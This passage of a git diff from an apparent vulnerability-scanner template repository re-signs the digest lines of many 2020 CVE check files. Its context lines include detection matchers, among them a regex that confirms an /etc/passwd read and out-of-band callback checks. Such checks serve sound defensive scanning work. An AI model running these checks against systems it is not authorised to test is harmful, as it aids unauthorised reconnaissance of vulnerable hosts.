490a0046304402205f8386f0894e4a5ed95d7986f6cfe22d73d8063ee2647f707f665bdbc0f9b5c20220373711b803f101999dbe22a26091260e8aa0b2892867bbd121f8ed6978870310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 0a03ff33ee..e886e4a34f 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220351956c4076b5c945da78c1f7ca4b062470b1039145c21aafaaccaea5044b9db02207d554851aec1c74cc8061be5f627d90b05ec7fa28a738c86a1f391b4acf10174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bef32526e90ddb09bb57c38b3fd11b608648a32f697c09f154728de2541a52f022031088ea83937b704239ee7fed67a51682e1b3cb2234bbf87f70387d158232753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 85a7fc395f..a5a9588d28 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbb346c3a43f73c414eb6ed526792050eb465a32f0a28251cad292479212181c02206d6bd66c126ad94302fd362178e914dd5d99e7af5cec7deffc553e0699899b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b44c39650dba7c75daabe2fee077ff2200be79fb1c7c6f2760278e18f47dc9bc0220400c4592332407f486b4644593b48f553d65fefdf4c8d7799022d86410b88079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 31d70be1ec..c8ec4682f2 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - '"name": "Alerta ([0-9.]+)"' -# digest: 4a0a00473045022100e204bd9385cf6b58f653e6b232edefbe1ce420d88afa77870717ebc626d8a2ea022067167ad2a0440c6d8e17db9ad35d149a90e5b289ee02d11bcaf428a2b3af61cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008374afd557adb127cd15e5de841792bb7ef8536cbf125283d8d8fb6c6a1b130022100e6a881e33555c33a5ba0ad64486315f3cef48f4c7cedb12d0c887dab8246861c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index a9b1045b02..3356ddb5bf 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -101,4 +101,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100833148b184c9a024daabe14d4fef1a74835dd8f418140ce52d04df763175d9e8022100f65031aa40e1c23f6150f38f0f8737a2ac23a8e5c5f4cc29f48a0de92a01de3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be9faf87543a83616237ad88cc863a1635a1425a953e40de96c995ba626e966c02205aef01716e33bbe562f462643400f53526a145d1aed3fbf0d6f9d0f8b640e9c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index c9e41d9290..ed03d23a82 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -64,4 +64,4 @@ http: json: - '.data.users.edges[].node.email' part: body -# digest: 490a0046304402207563b8edc19efc3cc19d14fdb717c94e8c29de7443af2fdb01addacf38917ef7022035b462d59175b05bc03b8666aa7cab3aebb000b9c0e22dec14d0dc05b0dfe876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e5b9157d7ae60c22f988cf39b691c717b7eb7bc093f14ac0bed7f55162ca0e1022100dd57ee313da7fcab09f97bc272e9b114cce21448f38a7d5e5db130e3df7b1c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index fcac697eaa..a4b5ee0637 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100c5b4229b7c0844e8fcfb9bc1679051e3ac701c065fd3e5789469152a7df1ec21022100980de112b617f6c799be1d61a0dd773d11dfc361c3d2bd02d98dae82ac6e8d47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220188b47530029da65c0cb5d784be49ec43adf43b570dd3393bb805a6c0247e42002204d833e981c82ee0b3f2cd4f6cbc6a03f072dc0a091250d4dc74817b28c8446a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 1b2c984cbc..d56d379e32 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fa8f3f605bced9c2bff8bd71dfd1b657c7806b31db0da37ba79f848736c0448022100b028c9c54f50d73729aa0630e94a3a90f88663ee769dae3762ef6b64d4da2dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053705e9ca543b6da6f715f98721e2301351adfd2835be7aea65337a604285e0d02206e6f0416654910b51302f1f90490a1f60cff9ede2ad03ef280746ac92e2298cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index c3ff473896..ee8a0d7b4c 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022005cc8cc6d259f90bddcc4ab74577e25407c52171a5893d763b5d5ab1dd6159c602204a99b859d07b48c2f47cf2a1a8329315e236c3999217ea353e49076587c74df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ed17b2d49ff9f65ce2c0e4da3dcc47bfb60f16e802588f87c2b5a373ce7c401022100b26845fa81b1cda894e0d93ede5da56f800e98f4783cfdbe5541056c8fea6ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index e311fbcca2..d697b3fbac 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -46,4 +46,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and -# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de8e68d9f94b82af184c4830778f5a38d929abe4ad7c1b9a60ab64389a0adf0102200abfa6c9701dce38f221abae9f7130bf100efa9f0c5232356ad4a034340561b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 69fb387790..2e5af92475 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207895664fdebc5404ce9b5e8146b8dd8f79fea659ab11352290da20fb6d1072500221008a648ae8987c5477eb6f059f6f17812e94cca5d74f45fe63e21768958c8304b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index b8714487f4..c410fc5139 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206614a114a0e46ccd3935e0a85a4ce47db02ad69127536ba5caaf39e4b766fd7b022100e8ec849c63835f81173d35f82f959e45539cb809a531d887b39b8e4880829958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ac39771de2484f18af059ca50ec2d4e00b27c1e116ec99ff98d059d208d7d7202207cc24efe15ea5aef6f8263ff50ebc9d661725d0385531fe59b2d5d4b67af3f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index a331f1c2fb..956b55feb9 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022021228856359476fd6a2d98aa76d72aecb684490df2490020087fe9acc00d15bc022100d44cd28e5f19364d83758d6ab7063cd8cc4b7512064a93b92f336fbfc44e35af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206bc085b42213b6080bcef49883d25766126822c2a961ff6399087b5325444dc5022100dc09c27ceb99097599ebc2efd75d6c5ab32d9445473235d7866558648db6acc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index d537647c4d..7ed869adf8 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022018dd73d96bac6da6fc47257dd5f2f32f35765baeeb0e50c617927f961d1ed43f02204921a13c37cf71890f34425dae58ae03f36c8aec68a45141cbd931b4edc23cec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb7f58cb5673f8053ed5ad66af0605d5d46519262e62342506a7219274f0a748022100b4f6625f370ff8dbc8c5b0437ec95cee595bda01458944bcc7c1985cae793bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index bea963d0ad..84fc04f8c8 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -66,4 +66,4 @@ http: regex: - '"username":"(.*?)"' - '"email":"(.*?)"' -# digest: 4b0a0048304602210083f16f101ac090f5d7e921131e73a027f6009fff40f89865c434db95593638b7022100a606966b55e981d57fde6523d60dc96e82d5cdc44a754742dac2b5268a081294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fa99af638c35821f64feec1eeb9f72c1e1c3cfabc1e1dca901f87a61a8160290221009c52db7f1fa2f35944f913d927e44976311c3424c70f0958cb7cc313bdc0827a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index cfd5a2452b..09bdbeb931 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -54,4 +54,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a0047304502210085ac18d58b25cda6f18fb57df5ee204220cce67dfd2d614ea043b10b5987195b02200ac8512718ee39d10cc0baed51f32d199ac3e7ef8c366405aa49af3e971df93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008753bfc0aaa2cfac772094b7526a43c03ae00319d48e9fb8501edc3defe9031d02200405f1f533dbfaeaaecd2e08cf2c008173e37db359a53e5b59a07c175ae4567c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 76ca5cba57..d8cf3a3da9 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048dc7f2955a7c8165a805ab421aa67f77e3dbbf8babf696b4c0b85a3d615efcb0220385a7cfa496fb6ae1edfd40595f13672069e6ed62c0b12c3ecfd17a44eca5e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6c7f2a1023bb8cf377fabfbbb4829f00d2a7a324a1f4559b5194b1efd41728d022061a65ea3ea14cd681975c01cb9ef4b911f1cc14e8257bf2298322a46ac77766f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index cbb4b49bd1..20fbd8c529 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d99bce4a30e181474d84ef417a6772ad649cef64e498eca647280f76e3aa0baf022100f3f1b147ebdb237cb4b2996e8381b65b8d62448c26388dce6c2d5d98a4096fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b39d0c69db45263931714ef86ba9b05e11117b87908d4c8601c8cd0d1c84c72002200a0396346a089b447831c1bc88819562f3c8f36ceb448c88a4fbe9b25608386b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 19444ba22b..2b34ffa712 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eef3cee9242d0faa4d39283bfb69171f37df3516899ca083fcabad8c7f4cdcb70221008f958e6457bea7a1c342e6b6efc6c8e6a23e3e42c6f0a677925b842c310e06e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff0343063bc6bc3425ce7d844033dddb9b55a410a25236f5f1c13901f3464c61022100da2ca986d7243ef4b6f669ea2fda6c579087f9254f8d978059a5ae043f93c2a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 7fde469b2a..83c8576e2d 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210087e6438b7ef91ed9ace5b21965669d3e02629d42a780db4c203d43f6c7e9994102202503aaac6e263ea1eb468d45732cc06a390e660c0e0cf3c6656daf03a4773b3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203cc2a005024db88784e43aee67a4df8d491936a6c510c86d525b3138904a5cd802203f6db67c09dd08363694a4436f3398785c26e75be24ce85e88dd82edb20b83d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index d4742310cb..e086b0633b 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022077b1c5498dae902e0ad7e7405b7d959c4faf796f270db4dc8ad70f78d13f8abd0221009a4e7d605a8b99d9957f179e9e090b48217d6acde1a09be14427c5a9ceadc952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a961e5e3dc591d1ed31952da38d3c4adda8a605b53182dd3cfaf34a4587adbd02204bc0a9fd3fd1d1cf9066837dfe68c9e2892868bd518817ec6fd744cfd35eaff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 69e589c909..3434eddbcb 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201a710f599e37ca84f4c5ce50b0de3c5b186ecb2e2cde5baa91a5c12c03034c4102204701cdfa4f09f39c53d5b5c108f3d652ba3f452608e7b4a10e86eb9f1b2cbf65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100993a7e9ecefdc365e401fed26718a5ea7c473d5907d41afb8454c7a705c79365022005c1006a6349b16a557fb1ba985d7021bc8612d94e88e68a04dec75b39a90c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 014ee1b3cb..d8c23bb270 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f683809abe7e85cb3a1175e77d284384bd3388b4ce037518577b11a1b99573dd02202b7395ca11974b5bdc4ce385c42281ae695c79b19c7d4b4fb12b108a532a8ebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 4705cb52ef..9bd5d4b457 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -44,4 +44,4 @@ http: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and -# digest: 4a0a004730450220083b1af8636250e0a465400427ebe39df44c1fd2fdafc0ab28ceac1ec21a2b6a022100ca085d560a8304af5d6162c1f37d3d62931dc1454d92c6003bff69c446ddc062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd5c3435bffa71b4591359a06350a03e4b9f6ce811aae30dc0e94698ac9270a0022100d48d31ccdc552ae4840aa07a3a710b5f08a2e5b2736b0a7070c515442ed8ec4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 8ed3be85fa..01e33cf6bc 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -42,4 +42,4 @@ http: - "log" - "Index of" condition: and -# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204afffb6d64aa4882aae9e0cf9cc281bb76021177859483ea797b53357f06e64f022100e33004b17c4e22b77183320977185babddce8f34d7688d5c4ba9419c3e1ea106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 4a58de3baa..ae9ee842a5 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d90bc7e3d71533f0575c136f4f13a6f7a419598ac09d57913c52d0239e3ac87d0221009ca68b1baddc88c46aaa979a70542106d8e7165c78038258ac7f35037066fee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc50d4afe23ea33ae214e9a6ed2d16702561177aef949c0b88e96bf25b51558802200f9b1b62e778b927f3ffa9baa5c2ef58e43976a9a6b15a4e80a8111135652ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index dd892cf895..96155b7dcf 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a5db837668619514abd4b5a118f7e041c8f574a24b94397925bfe86afa7e3b90221009e04fec147cf698f9d10617130be06ffd77f3b4b3e7e1f035ec980127c66bded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f30e703a1e893ff7bfaa5878aa52127a107b8cca0b273efd668e19ad5510f28f022100c88a15ae1f91f2812f6b2533dfe5e1d2fe4589a54cb4e571b2be499397edb364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 175e774e0d..3e3b12c22b 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - "(?m)Stable tag: ([0-9.]+)" -# digest: 4a0a0047304502200119d40e914be20d2c6e92899c0f92c4d47e25598a6a62e070775ac3598541ac022100f55d4088bdcb51738c6039670f2b8f9a5196c7f7458c1f9094355d76e42655ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af1f6a44be71df3c9a07f178f137fef959ed1244d618811085fce868ef3e24320220601198d66dbfd49b6055125af5efde33ea18ca71f7dee65a351b8bae690c152a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index a8c5341f0a..043a9ed9e3 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502201da11702e06331d8f8ff219e8bc69220f6171544ccfca6ecad9fef40ba169072022100fd26ae7a0963bb2a89e2e46906d37c053117091322cb077181667ab57e425b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020f4ae20a8aaf732d50af366255c4a6a74698e1ea2066b89a865d5f04ab165a40220362b395455a12f623a963a4fcb5dd2415bb18ec0fc8133fa951323996e27531b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 6501f849b1..ddff9485b7 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100911e463b70d73004e8ef94a9baaac09e041d404c58da64317ee96c7588297ba00220192e115eb0658148208f16c7326d2bc2148e422ac20569cd1d135b81008c25f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6538734b8e31d59a4a247023a9d1e293d5375a02a2c5d5f17886d8c6b4b656402203136d4ab15fa023efb48df10c1cbdf0f852e905d08bbbf6717bcb6328f1aa6b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 1cbc6725b4..2da0dc127d 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022075f0d76f377b911a20e32b13ad32f15eb5fb1e0fedbbe5b7660104f21d20d391022100f93eba91a2d924cd4d3530e6362549fdf26d23ebb303d135ddefc8da78e196a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee11fe056898e5fd350c49df1dd45943e21f32ee2e4e1a0e5ba8315b3a3c8de3022011191bcaebc6056b7f816437b0c9075fb5d3bd87a2be9c84daa45d5ae8c2596a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 3c813132cc..c1928115d5 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100908e8f49353459e425b78f84c48a3efbe2ecad152c2a624e2e70b0eeb7d03276022100d679f9d150a3e04b488914d12e3cc57b7c1c89f983a0adc5e35f4dc5310b70ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbb2a8bf728c4c43291d2c61c2bd9d5199cb6948e78cee0b50ef9fe2fbf53d910221008bb0ab7b0858acf338ecefe99cd21ef1c5a6f604abbc02b1909964416040dea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 5f3bc76f8d..13b92965e6 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a22843600fa540dd4035057b8812dca1cabaf0cb179c022be93bcd61aa640a6702200ad6f005a0c0b15427d37ec3fbbb81e0edea63010d20973f1d3760735d993b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084623c91c09a63d9e5040882329f1c8a8bfdddceefc995974de79d15d63b0f7c022100c9769e30d0acd487de81f5d069ff42bb5ad23850e07d7aef93ee001c2a098010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 176ff3534b..2b6dd3022a 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022054a4c1c91d4dc2db65ddab6c58e5ce6ed8009e20d03a321ac03742dfdab22439022100917d48526b787d17f67533ad55a2b0e0d3264e2eb38c019d56255c6a244c707c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210094d40af2574756b83b158c132f40fc217f5a2f121bbd22db1e63491cae113a24022072c5efda1f80298814f7b07e23bcbfbc7c6ac9fda61fd2eca44f794c45da6f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index a1583675d8..99247dd76c 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -74,4 +74,4 @@ http: negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' -# digest: 4b0a00483046022100b22461d6f3fb20ee41694adc4d1a172d49954b2fd5e4ffe9b471b7245fc3ebe2022100cf54164abf938038a87d987cc754a82f7fb0325896c2bfe719cb9dd70c139aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9321d3556d4f5143711903a0654ba7e342162a38e8ae25357f182c8009359b4022100b85321eaa826162b86ed187c90f7f9046462fc0837f9636752d1c933e5cab24e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 9e3fd91d47..1dc59dd239 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -50,4 +50,4 @@ http: part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' -# digest: 4a0a0047304502204c5e621f8e72efbb78024a1d448302c1b840c428b84bd1d8c46c91a239f8fae40221008c5563e6e9537a8190b64c882918cb880fa670f4410e0ff17c0d132bd4ffb4ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220160db8987fea4ba565870df9c6df758db6fa682ef92ff4c6f6432ad406cfe4e9022079f90c859e2f4df2a98a1c71be7f48d55b3aec47a393cd1b66068046c493e3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index d1a397b88b..3a639939c6 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100c093406f2e20ab363ad2e5b2e58e612c32e582979f5b76239ee293f40c516cf3022100bc62dd62624a4844c2599ec0db7386bdb99d72bf47b9f60294a335e73d51f719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 